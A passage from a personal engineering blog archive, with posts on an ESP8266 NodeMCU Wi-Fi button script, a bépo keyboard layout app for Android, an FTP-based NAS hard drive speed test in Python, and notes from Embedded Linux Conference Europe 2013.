I then discovered the official nodemcu-firmware documentation currently points to the dev branch; which has many new modules and functions I wanted to use (like the wifi event monitor or http module) that weren't available in master yet. I used the nodemcu cloud builder, a service provided by a kind community member to build a custom version of nodemcu-firmware on the dev branch and the modules I needed enabled.

This allows to do this kind of code, that connects to wifi on a button press, and reacts with a simple HTTP request:

function connect()
    -- if wifi is already connected (config saved), launch job directly
    if wifi.sta.status() == wifi.STA_GOTIP then
        doOnlineJob()
        return
    end
    rgb(1000, 50, 0) -- turn orange
    for event=wifi.STA_IDLE,wifi.STA_GOTIP do
        wifi.sta.eventMonReg(event, monCallback)
    end
    wifi.sta.config("mynetworkssid", "mynetworkpassword")
    wifi.sta.eventMonStart(100) --the event mon polls every 100ms for a change
end

function monCallback(prevState)
    state = wifi.sta.status()
    if prevState == nil then
        prevState = "unknown"
    end
    print("Wifi status " .. prevState .. " -> " .. state)
    blueLed(state*204) -- led intensity depends on status, with success = OFF
    if state == wifi.STA_GOTIP then
        rgb(0, 200, 150) --blue/green-ish, wifi OK
        print("Got IP " .. wifi.sta.getip())
        wifi.sta.eventMonStop("unreg all") -- stop event monitor
        doOnlineJob()
    end
    if state == wifi.STATION_NO_AP_FOUND or state == wifi.STATION_CONNECT_FAIL then
        rgb(150, 0, 0) -- red/fail
        wifi.sta.eventMonStop("unreg all") -- stop event monitor
    end
end

function doOnlineJob()
    rgb(150, 0, 150) -- working, purple
    http.post("http://example.invalid/api/pushed", nil,
        '{"hello": "from_esp_witty_42"}', function(status_code, body)
            if status_code == nil or body == nil then
                print(status_code)
                print(body)
                rgb(200, 0, 0) --fail red
                return
            end
            print("Got code " .. status_code .. " answer " .. body)
            if status_code == 200 then
                rgb(0, 0, 200) --success, blue
            end
        end)
end

This is reproducing the software function of the DASH/IoT Button, Netflix Switch or Flic.

There are a few projects that will guide you through the hardware part of building a button with an ESP module.

PS: Be careful of big https cert chains, there's a hardcoded limit of 5120 bytes for the SSL buffer in the firmware, that might make the handshake fail.

PPS: 2016-07-01 I did a talk on ESP8266 modules at the Paris Embedded Meetup #9.

Bépo-android

2015-01-27T00:00:00+01:00

This is a small project I recently released on github and Google Play. It aims at catering to the needs of people using the bépo layout, and wanting to use it for physical keyboards on Android.

Bépo is a french dvorak-like keyboard layout; it was designed by a community of enthousiasts, and is now included in Xorg. Its platform support is pretty good on the three main PC OSes, but limited on Android. For physical keyboards, there's a paid app that supports the bépo layout (as part of whole package of other keymaps) but it requires you to use it as your input method, whereas since Android 4.1 it's possible to have custom keyboard layouts exported by apps and managed by the system.

It's this facility that is used by bepo-android (or Bépo clavier externe): a simple intent property you declare in your manifest to tell the system that you're exporting keyboard layouts, with which you point to an xml file listing all your keyboard layouts, each pointing to a single .kcm file. bepo-android is currently exporting a single layout file, generated for bépo.

The bépo project has this wonderful tool called the configGenerator that allows regenerating the whole set of keymap files, images of the layout, configuration files for all platforms in a single command; which runs a few shell, perl and python scripts. This allowed the project to move fast when making modifications, but is today used mostly by enthousiasts creating their own variants (I used to have such a variant, but now I just use the official one). I created such a script for the android platform. So the script generates the necessary .kcm file, and could be re-run with your own customized bépo layout as source. An alternative possible use would be to use its ability to read xkb files to export Xorg keymaps to Android. This would probably need adaptation to add support for more exotic languages and characters.

Android has this two-tier keyboard management system. First, there is the key layout, which maps evdev keycodes into key names. The key names currently match the ones Linux's input.h. There's a default key layout you can use as a base, Generic.kl. Then there's the key character map, that will tell the system which unicode character to input when you press a given key. This is at least two order of magnitudes simpler than Xorg's system; although xkb is also much more powerful.

As you might have guessed, the file generated for this project is a key character map, that also uses the undocumented "map key" directive, to remap a part of the key layout to make sure it's not changing under us; for instance Archos has a different key layout for its keyboards than the default.

One of the tradeoff I had to make was to have the underlying key layout a QWERTY, that then generated bépo characters. This decision was due to the fact that we cannot attribute key names to all keys: ÉÀÈÊÇ, etc. don't have key labels (found in KeycodeLabels.h or InputEventLabels.h depending on your AOSP version), so you can't simply remap all keys in order to have a bépo key layout; you'd have holes in it. I therefore had to resort to using QWERTY as base, as it's the one in Generic.kl. I'm also secretly hoping it might help with badly-programmed games that have keyboard support, assume qwerty, and don't allow key remapping. If those exist on Android. (but they are legion on the web, which is very annoying).

The bépo key character map also maps the documented special diacritical dead keys; this is quite useful, but not as complete as xkb's many dead keys; and not nearly as powerful Xorg's Compose; so not all bépo dead and compose keys are supported.

This currently only works with devices having Android 4.1+, provided the manufacturer didn't botch the external keyboard support, as Asus did on my Fonepad 7 (K019), and as a user reported a Samsung Galaxy Note 10.1 to be. OEMs do that to allow synchronisation between the virtual and physical keyboard layout, but this is just wrong if it removes the user's ability to chose his own keymap.

I have yet to hear from other non-working devices; after a month or so, the app hasn't seen much traction (Google Play says there are less than 50 installs); so maybe in the niche that is bépo, there isn't much interest in typing stuff on Android. We could even wonder if people would ever do productive work on this platform. But that's a debate for another day.

At least I scratched my itch =)

Get Bépo clavier externe on Google Play.

Testing a NAS hard drive over FTP

2013-12-20T00:00:00+01:00

So I have this NAS made by my ISP, that does a lot of things; but recently, I started having issues with its behavior. Recorded TV shows had lag/jitter while replaying, and the same happened with other types of videos I put on it. I narrowed it down to the hard drive, which was sometime providing read speeds of less than 300 KiB/s. I cannot open it to test the hard drive more thoroughly, using mhdd or ATA SMART tests. I'll have to innovate a little.

In this post, in the form of an ipython3 notebook(source), I'm going to test the hard drive over ftp, by doing a full hard drive fill, and then a read. I'm going to :

measure the read and write speed to see if the problem is still present after I formated it.
make sure what I wrote is the same as what I read
I'll have to make sure that I can generate data fast enough
And I'll try to make the data look "random" so that I don't stumble upon some compression in the FTP -> fs > hard drive chain.

If everything is well I'll just get on with it: formatting the hard drive fixed the issue. Otherwise, it's might be a hardware problem, and I'll have to exchange it.

To generate the data, I'll use an md5 hash for its nice output which looks fairly random, and this is very hard to compress. I chose md5 because it's fast. I'll use a sequential index as the input so that it's deterministic and I can fairly easily re-generate the input data for comparison.

import hashlib
h = hashlib.new("md5")
#Generate a deterministic hash
def data(i):
    h.update(bytes(i))
    return h.digest()

import time
def testdata():
    n = 10000
    size = h.digest_size
    start = time.clock()
    for i in range(n):
        data(i)
    end = time.clock()
    speed = n*size/(end-start)
    print("We generated %d bytes in %f s %d B/s"%(n*size, end-start, speed))

testdata()

We generated 160000 bytes in 1.610000 s 99378 B/s

Ouch. I use a slow machine, and it's far from the at least 60MiB/s I need to thoroughly test the hard drive. Let's see if I can find a faster hash.

def testallhashes():
    global h
    for hash in hashlib.algorithms_available:
        h = hashlib.new(hash)
        print(hash, end=' ')
        testdata()

testallhashes()

SHA1 We generated 200000 bytes in 2.570000 s 77821 B/s
SHA512 We generated 640000 bytes in 6.780000 s 94395 B/s
RIPEMD160 We generated 200000 bytes in 2.870000 s 69686 B/s
SHA224 We generated 280000 bytes in 3.480000 s 80459 B/s
sha512 We generated 640000 bytes in 6.770000 s 94534 B/s
md5 We generated 160000 bytes in 1.620000 s 98765 B/s
md4 We generated 160000 bytes in 1.350000 s 118518 B/s
SHA256 We generated 320000 bytes in 3.500000 s 91428 B/s
ripemd160 We generated 200000 bytes in 2.870000 s 69686 B/s
whirlpool We generated 640000 bytes in 19.590000 s 32669 B/s
dsaEncryption We generated 200000 bytes in 2.580000 s 77519 B/s
sha384 We generated 480000 bytes in 6.800000 s 70588 B/s
sha1 We generated 200000 bytes in 2.570000 s 77821 B/s
dsaWithSHA We generated 200000 bytes in 2.580000 s 77519 B/s
SHA We generated 200000 bytes in 2.580000 s 77519 B/s
sha224 We generated 280000 bytes in 3.490000 s 80229 B/s
DSA-SHA We generated 200000 bytes in 2.570000 s 77821 B/s
MD5 We generated 160000 bytes in 1.600000 s 99999 B/s
sha We generated 200000 bytes in 2.570000 s 77821 B/s
MD4 We generated 160000 bytes in 1.350000 s 118518 B/s
ecdsa-with-SHA1 We generated 200000 bytes in 2.570000 s 77821 B/s
sha256 We generated 320000 bytes in 3.490000 s 91690 B/s
SHA384 We generated 480000 bytes in 6.780000 s 70796 B/s
DSA We generated 200000 bytes in 2.590000 s 77220 B/s

Well, no luck. I'll just use a big buffer and have it loop around.

def bigbuffer():
    global h
    h = hashlib.new("md5")
    buf = bytearray()
    count = 2**18 // h.digest_size  # we want a 256KiB buffer
    for i in range(count):
        buf += data(i)
    return buf

assert(len(bigbuffer()) == 262144) # verify the length

That's for the basics.

class CustomBuffer:
    """
    A wrap-around file-like object that returns in-memory data from buf
    """
    def __init__(self, limit=None):
        self.buf = bigbuffer()
        self.bufindex = 0
        self.fileindex = 0
        self.bufsize = len(self.buf)
        self.limit = limit
    def readloop(self, i=8096):
        dat = self.buf[self.bufindex:self.bufindex + i]
        end = self.bufindex + i
        while end > self.bufsize:
            end -= self.bufsize
            dat += self.buf[:end]
        self.bufindex = end
        return dat
    def read(self, i=8096):
        if self.limit == None:
            return self.readloop(i)
        if self.fileindex >= self.limit:
            return bytes()
        if self.fileindex + i > self.limit:
            dat = self.readloop(self.limit - self.fileindex)
            self.fileindex = self.limit
            return dat
        self.fileindex += i
        return self.readloop(i)

def testreadcbuf():
    f = CustomBuffer(2548)
    assert(len(f.read(2048)) == 2048)
    assert(len(f.read()) == 500)

testreadcbuf()

def testcbuf(limit=None):
    f = CustomBuffer(limit)
    l = 0
    start = time.clock()
    for i in range(10000):
        l += len(f.read())
    end = time.clock()
    speed = l/(end-start)
    print("We generated %d bytes in %f s %d B/s"%(l, end-start, speed))

testcbuf()

We generated 80960000 bytes in 0.780000 s 103794871 B/s

That's more in line with what we need.

the FTP stuff

import ftplib
from ftpconfig import config, config_example # ftp credentials, etc

print(config_example)

{'password': 'verylongandcomplicatedpassword', 'host': '192.168.1.254', 'path': '/HD/', 'username': 'boitegratuite'}

def ftpconnect():
    ftp = ftplib.FTP(config['host'])
    ftp.login(config['username'], config['password'])
    ftp.cwd(config['path'])
    return ftp

def transfer_rate(prev_stamp, now, blocksize):
    diff = now - prev_stamp
    rate = blocksize/(diff*2**20) # store in MiB/s directly
    return [now, rate]

def store(size=2**25, blocksize=2**20):
    values = []

    def watch(block):
        t2 = time.perf_counter()
        values.append(transfer_rate(t1[0], t2, len(block)))
        t1[0] = t2

    ftp = ftpconnect()
    buf = CustomBuffer(size)
    t1 = [time.perf_counter()]
    try:
        ftp.storbinary("STOR filler", buf, blocksize=blocksize, callback=watch)
        ftp.close()
    except ConnectionResetError:
        print("Connection severed by peer")
    except Exception as e:
        print("Transfer interrupted:", e)


    return values

values = store(2**27)

Now trying to show those values !

%pylab inline
import matplotlib.pyplot as plt
import numpy as np

a = np.array(values).transpose()
plt.plot(a[0], a[1])
plt.ylabel("rate (MiB/s)")
plt.xlabel("time (s)")
plt.show()

Welcome to pylab, a matplotlib-based Python environment [backend: module://IPython.zmq.pylab.backend_inline].
For more information, type 'help(pylab)'.

Ok, we have what we wanted: we can measure the write speeds.

Now let's check read speeds.

def reread(blocksize=2**20):
    values=[]
    verif = CustomBuffer()
    i = [0]
    def watch(block):
        t2 = time.perf_counter()
        values.append(transfer_rate(t1[0], t2, len(block)))
        dat = verif.read(len(block))
        if dat != block:
            print("ERROR !!!! Data read isn't correct at block", i)
        t1[0] = t2
        i[0] += 1

    ftp = ftpconnect()
    t1 = [time.perf_counter()]
    try:
        ftp.retrbinary("RETR filler", blocksize=blocksize, callback=watch)
        ftp.close()
    except Exception as e:
        print("Transfer interrupted:", e)

    return values

def plot_transfer_speed(data, title):
    def average(arr, n):
        end =  n * (len(arr)//n)
        return numpy.mean(arr[:end].reshape(-1, n), 1)

    a = np.array(data).transpose()
    a0 = average(a[0], max(1, len(a[0])//300))
    a1 = average(a[1], max(1, len(a[1])//300))
    lines = plt.plot(a0, a1)
    #plt.setp(lines, aa=True)
    plt.gcf().set_size_inches(22, 10)
    plt.ylabel("MiB/s")
    plt.xlabel("seconds")
    plt.title(title)
    plt.show()


rval = reread()

plot_transfer_speed(rval, "Read speed")

We have all the pieces now. Let's do the filling and plot the data.

# About 230Gio is the effective size of the disk (almost 250Go)
val = store(230*2**30, 10*2**20)

Connection severed by peer

plot_transfer_speed(val, "Write speed")

rval = reread(10*2**20)

plot_transfer_speed(rval, "Read speed")

That's it !

We could also plot the read speed against the disk byte index instead of time, which would maybe be more interesting. This is left as an exercise for the reader.

Regarding the data, it's far from what we could get with ATA SMART (using smartctl or skdump/sktest), but it's interesting nonetheless. We can see the read speed falls sometimes, which may be indicative of localized hard drive problem.

What does not appear here is that I've ran the tests multiple times to make sure the data is correct. And both the read and write are long, multi-hour tests.

Also, the simple fact of making a write test may fix an existent problem, by making the disk's firmware aware of the existence of bad blocks. This is amplified by the fact that I ran the tests multiple times.

Finally, what could be improved is having a better way to display a high number of data points. I've used here the average method, which might not show how low the read/write speed can go locally. Maybe displaying the data using a vector format would be better (svg, python-chaco ?).

Regarding the decision to dispose of the hard drive or the NAS, I think I'll keep it for now until it dies, but I'll start putting my data on a external HDD (plugged to the ISP box), and only trust the internal hard drive with low priority stuff like the occasional video recording.

Embedded Linux Conference Europe 2013 notes

2013-10-30T00:00:00+01:00

So I was in Edinburgh this year, and I took notes as I usually do. These are intended for personal consumption (do no expect LWN-style reports), but as more people were asking me to share them, I thought why not do it in public ?

Embedded Linux timeline

by Chris Simmonds

Busybox was started by Bruce Perens to solve the floppy installation problem. The first Linux Router was described in "Arlan Wireless Howto".

Linux gained portability to other architectures over time:

1995: MIPS
1996: m68k, ppc
1998: m68k Dragon Ball Palm Pilot : creation of uClinux (no mmu)
1999: ARM

Flash memory support was added by David Woodhouse in 1999 (MTD layer), then JFFS by AXIS for their IP cameras.

Devices

Things really started in 1999: AXIS IP camera, TiVo DVR, Kerbango Internet Radio(Threecom). Lot of media coverage at that time.

Companies sprung out to service embedded linux: Timesys, MontaVista, Lineo, Denx.

The handhelds.org project aimed at porting of linux to Compaq iPaq H3600. Cross-compiling being a pain in the arse, they had a cluster of ~16 iPaqs to compile code.

In 2001, there was the infamous Unobtainium : handset prototype at Compaq based on iPaq hardware with GSM/CDMA/Wifi/Bluetooth, camera, accelerometer, 1GiB of storage: it was really the first smartphone prototype. Never shipped.

At the same time, Sharp made the Zaurus running Linux 2.4.10 (software made by Lineo).

In 2003, Motorola made the A760 handset, first Linux handset (MontaVista) In 2005, the Nokia 770, the first Internet Tablet running Maemo Linux.

Buildtools and software

In 2001 buildroot was created from the needs of the uClinux project: it's still the oldest and simplest build system. Then OpenEmbedded in 2003. Then in 2004 Poky Linux based on OE by OpenedHand, then Yocto. In my opinion Chris has a narrow view of the build systems choice (what about Debian?)

Real-time was at first achieved with sub-kernels, like Xenomai. Then Native Real-time : Linux/RT 1.0 by Timesys in 2000. Then the voluntary preempt patch (Ingo Molnar & Andrew Morton). Robert Love kernel preemption patch in 2001. In 2003 Linux 2.6 includes voluntary preempt. In 2005 PREEMPT_RT was started, in 2013, not all of it is merged yet.

In the end: Linux is the "default" embedded OS.

How not to write x86 platform drivers

by Darren Hart

This talk was mostly a feedback around getting the Minnowboard mainlined properly.

At Intel a platform is CPU + chipset, or a SoC. In Linux, it represent things that are not on a real bus, or things that cannont not be enumerated, leading to board fils drivers.

The Minnowboard uses a 32bit UEFI Firmware. One of the first designs to make use of all Queensbay(Intel SoC) GPIOs. The UART clock is special (50mhz). Low-cost Ethernet phy with no EEPROM for macs. The Minnowboard is a dynamic baseboard, which is very different from what Intel usually does: it supports daughter cards.

There are three main sources of GPIOs on this board (5 core, 8 suspend, 12 pch), 4 user buttons, 2 user LEDs, phy reset, then expansion GPIOs.

Board files

MinnowBoard used board files at first because they are simple to use.

Those were rejected. Why ?

not automatically enumerated and loaded
adds maintenance
independent drivers had to be board aware

All this leads to "evil" vendor trees.

UART clock is firmware dependent. Previous code used DMI detection, which isn't nice.

Ethernet is complicated: aggressive power saving meaning you must wake it up open. How to id the PHY ? You could use SMBIOS/DMI, DT, ACPI; in the end PCI subsystem ID were used. Initialized with platform_data.

The MAC: no EEPROM, so had to solve how to get a MAC. Was done in firmware in the end: read the SPI flash, then write PCI registers.

To preserve the platform on should not create vendor trees. The complexity of core kernel vs drivers is inverted: core kernel has simple primitives, but complex algorithms. Drivers are the opposite: simple to understand, but hard to organize, how they fit together.

GPIO, take 2: ACPI 5.0

A lot of things can be done with the new ACPI standard, like identify GPIO resources. You can't do keybindings, default trigger, etc. Some vendors (like Apple) do already, but with their own proprietary additions.

One needs to write ASL for the DSDT. You might want to have dictionaries to describe your hardware, which needs to be standardized. Right now ACPI reserved method are used (_PRP).

Device trees for dummies

by Thomas Pettazoni (Slides)

Before DT, all the information was inside the kernel. Little information in ATAGS. Now all information is in DT.

Device Tree is a tree data structure to describe hardware that cannot be enumerated. You compile a DTS (source) into a DTB(binary). In arm, all DTS are in arch/arm/boot/dts and automatically compiled for your board. Device Tree bindings is the "standard" for how you should describe the hardware using the DT language, and what the driver understands. All bindings should be documented and reviewed. DT should not describe configuration, just hardware layout. The problem isn't solved yet for configuration.

The talk had a lot of nice syntax examples to learn how to write DTS. For example, Thomas explained the importance of compatible string, which are used to match DTS node device with a driver.

Should DT be an ABI ? Hard question. While it was the original idea, maybe it shouldn't. Current discussions seem to want to relax the stable ABI rule.

Use case power management

by Patrick Titiano (Slides)

First rule about PM: shutdown anything not used. You need to track running power resources: it starts with the clock tree.

Things to monitor:

C-states/idle states stats.
Operating point statistics
CPU & HW load
memory bandwidth : most often a bottleneck

You need to instrument both software and hardware. It means you need resistors points in the PCB, temp sensors. You need to automate everything, otherwise you're not comparing apple to apples. All measurements should be automated to be easily reproduced.

You need to have power model of your raw soc consumption and characteristics, then you need to assess this model to verify that the target is realistic.

Voltage is more important than frequency. It's easier to reduce consumption than to find better way to dissipate energy.

Battery is king. You need a full system view, because you should optimize the biggest offenders first. Take care of inter-dependent stuff.

Android debugging tools

by Karim Yaghmour (Slides)

Android usually runs on an SoC. It uses bionic, a different libc, it has a Hardware Abstraction Layer that allows proprietary drivers in userspace. Toolbox is lesser busybox clone in BSD.

Binder is a standard component, object IPC, that almost defines system android. Every system services uses that.

To debug, it's handy to load AOSP in eclipse. You can load all the OS classes and apps in the editor to be able to trace anything and browse AOSP while seeing classes, call chains, etc. It's more powerful for browsing and live debugging than common editors. You still have to build AOSP by hand (type make/lunch) to generate an image.

A few tools:

latencytop, schedtop, etc.
dumpsys
service
logcat
dumpstate (root app), bugreport : dumps system state (in /proc, etc.)
watchprop

Logging goes through the logger driver.

Interfaces with the system:

start/stop : stops zygote, which means you can shutdown/start the interface and all the java stuff
service call statusbar {1,2,5 s16 alarm_clock i32 0} : you can call methods directly that are defined in an aidl file, by using their implicit sequence number. It's useful to bypass the java framework and call the services directly. see in android/os/IPowerManager.aidl for example, or android/internal/statusbar/IStatusBar.aidl for the previous example
am : tool to call intents. e.g am start -a android.intent.action.VIEW -d http://webpage.com . Very powerful tool to call intents
pm : calls to the package manager
wm : calls to the windows manager

When working with AOSP sources, source build/envsetup.sh, it has very handy functions, like:

godir: jumps to a dir a file is in
mm : rebuilds the tree
jgrep/cgrep/resgrep : grep for specific files (java/c/resource)
croot : jump up to aosp root

Take care when working it AOSP, it's BIG (about 8GB)

When debugging, you have to use a different debugger depending on the use case:

ddms for dalvik level stuff
gdb/gdbserver for HAL stuff
JTAG for kernel

DDMS talks JDWP (Java Debug Wire Protocol). Use the one from AOSP, not eclipse. It's very powerful to debug (java) system processes live.

gdbserver: you have to configure your app's Android.mk to have -ggdb, and disable stripping. You also have to do port forwarding with adb in order to access gdbserver:

adb forward tcp:2345 tcp:2345

You can use the prebuilts arm-eabi-gdb, but Multi-thread might not be supported.

logging

logcat works
ftrace is supported through systrace
atrace (device dependent ?)
perf is not well supported on ARM

Embbedded build systems showdown

A nice panel, where we had representatives of different build systems: - DIY : Tim Bird, Sony - Android : Karim Yaghmour, Opersys - Buildroot : Thomas Petazzoni, Free Electrons - Yocto : Jeff Osier-Mixon, Intel

It was very friendly. The take-out is that each system addresses different use cases. Yocto is big-company friendly, because it has metadata and licence management built-in. Tim Bird said he had a personal preference for Buildroot as a developer, although a division of his company recently switch to Yocto for its projects.

Karim's opinion was that although Android wasn't community friendly, that it couldn't integrate with anything external, it was king in term of market traction, and that it might be the most used system in any kind of embedded device in 4 to 5 years.

Best practices for long-term support and security of the device-tree

by Alison Chaiken (Slides at Author's)

DT make life a bit easier, although there are pitfalls. Best practices could help with that matter.

Updates are hard without DT. How about with DT ? Should you update the DTB ?

DTs are supposed to be for HW description, but there already many configuration items in DT: MTD partition tables, boot device selection, pinmux. Alison gave example about automotive and battery technology that's evolving that would allow updating electric car's battery. Cars have a lot of processors; e.g 2014 Mercedes S-Class will have 200MCUs on Ethernet, CAN-FD and LIN.

One thing to be careful about is Kconfig and DTS matching.

One pitfall you might have, is unintentionally breaking DT or device by changing something in a driver or another device. Example about Koen Kooi's post who said you might blow an HDMI transceiver on some board if you boot with micro SD, because micro SD uses a higher voltage by default.

You can use .its to bundle DTS, kernel and other blobs in one .itb file. Support was added in u-boot to sign .itbs by ChromeOS engineers.

One option floating around, presented by Pantelis, is to use DTS runtime overlays as an update method, similar to unionfs.

DTS schema validator looks like a good thing to have, like Stephen Warren's very recent proposal.

Android on a non-mobile embedded system

by Arnout Vandecapelle

The main motivation is the reduced time to market, and the wealth of available app developers.

It's interesting because it's still linux, but there are few differences (bionic libc, special build system)

My own impressions: lots of generic stuff, from someone who just recently went into android. Like most of this stuff, doesn't come from Google, so it has little "new" information in it. It was a nice conference if you've never heard of AOSP and have only been using other embedded distros/build systems.

BuildRoot : What's new ?

by Peter Korsgaard

BuildRoot

BuildRoot is an Embedded Linux build system. It's one of the oldest out there, and is fairly well documented. It has an active community. It's relatively simple, and that's a focus of the project to Keep It Simple (Stupid). For example, there's no binary package management.

It's Kconfig-based for configuration, and uses make for building.

Buildroot is package-based, and a build step just runs every package build. It's therefore a meta build system. A package is composed of :

a config (in kconfig format) for dependencies, description, etc. You need to include this config under the parent config option.
a makefile (Package.mk) with the build steps

Buildroot is using git for its source code, patches are posted on ML and managed in Patchwork.

Buildroot activity has been growing over the years: more emails on ML(~1000/month), more contributors (30-40 each month). Developer days are held 2 times a year (this year at FOSDEM and ELCE).

Buildroot is used in many products(Barco, Google fiber), and SDKs (Atmel, Synopsys, Cadence, Imagination…)

What's new ?

It supports more architectures (ARC, Blackfin, Microblaze, Xtensa…), and the variant support has been improved (ARM softfp/hardfp/neon…), as well as the nommu support.

Buildroot now supports more toolchains: C library (glibc, eglibc, uclibc), and external toolchains.

Buildroot has 30% more packages than last year. A lot of stuff has been added (gstreamer, EFL, wayland, systemd, perf, python3, nodejs…). A GSoC student worked on adding ARM proprietary GPU and video drivers support.

QA has been improved as well, with continuous integration/regression testing. The development cycle is now 3 months, with 1 month of stabilization.

License compliance has been added: every package should have a license, and "make legal_info" generates all the necessary stuff.

There's a new Eclipse CDT plugin. Popular boards got their own defconfigs to ease starting.

A lot of configuration options were added to the menuconfig. New options to add a rootfs overlay, or last-second hook scripts.

Upcoming work includes external packages overlays, SELinux support, updated systemd/udev, and whatever else gets submitted.

Hello, World!

2013-10-20T00:00:00+02:00

Update : I updated the information below with the 2020 tech.

So I finally did it. You're reading it right now. My personnal website/blog.

I should be posting here about things that cross my mind as well as various projects I've been working on. And maybe even new projets I didn't even start yet.

The design

First of all, kudos to Pascal Navière, a very talented web designer that did the design of this site(CSS, DOM structure, etc.), which I then modified. All bugs are therefore my own additions.

The tech

The DNS you used to access this website is hosted by gandi. The website itself resides at OVH, who used to sell the world's cheapest VPS (they're currently out of stock for all their products, but I won't go into that). The SSL certificate is provided by StartSSL.

On this VPS, Debian Wheezy, with nginx serving the actual pages. Pages which are all old scholl static HTML(5), generated by Pelican.

On my machine pelican is run with python 3.3, in a venv where distribute was installed. The content is edited with vim on Fedora 19.

Linux Engineer's random thoughts

Viewing adjacent French towns on Wikipedia

Querying Wikidata

The Wikidata dumps are big (for my poor RPi4)

What's a commune anyway?

Communes are created and terminated all the time in France

Processing the data, line by line

lbzcat is slow, grep is faster than jq

Wikidata is not Wikipedia: the data is not that clean

Viewing the data

Apache ECharts is nice…

but not the right tool for the job

Maplibre GL js

… what's the answer by the way?

What I learned during Advent of Code 2023

Rust

Tuples

Iterators

Enums vs raw data comparison

u8 vs char

Borrow checker

usize-only indexing is still annoying

Z3

ints helper

Small things

Algorithms and general tricks

Grid iteration

Tortoise and Hare: not this year

Transposition

Shoelace formula and Pick's theorem

Gaussian Elimination

Visualization and input analysis

Closing the gap on fediverse hashtag visibility with hashtag-importer

Why hashtag-importer

How it works

Crates galore

Rate-limiting

Real-world use: Kernel Recipes

FAQ

February to April Gears emulator update

Missing interrupt behaviour

Palettes

Making sounds

January Gears emulator update

Interlude: Tilesets

VRAM read/write CPU buffer

And this bug ?

Startup tileset

Bonus: region

What's next ?

December Gears emulator update

Fixing a rendering bug with backgrounds

Implementing missing features

Off-by-one error in sprite rendering

Background priority over sprites

Priority between sprites

A remaining map bug

FOSDEM talks and emulation

Emulator progress

Keyboard layout adventures

GPD Win Max Adaptation

Yubikey OTP with bépo

Inability to type with bépo AFNOR in a Linux console

Blog update

The design

The tech

Mass delete of Gmail emails

The ability to work remotely in Embedded is a sign of software engineering maturity

Automation

sispmctl

ser2net: serial port automation

Testing

Continuous Integration

Not everything can, or should be done remotely (yet)

A beginner hacker's guide to IPv6

How to read an IPv6 address: the zeroes are hidden

Put the address inside square brackets for URLs

Types of IPv6 addresses

Client IPv6 addresses are autoconfigured by default

DHCPv6 has lost and shouldn't be used

`lbzcat` is slow, `grep` is faster than `jq`

`u8` vs `char`

`usize`-only indexing is still annoying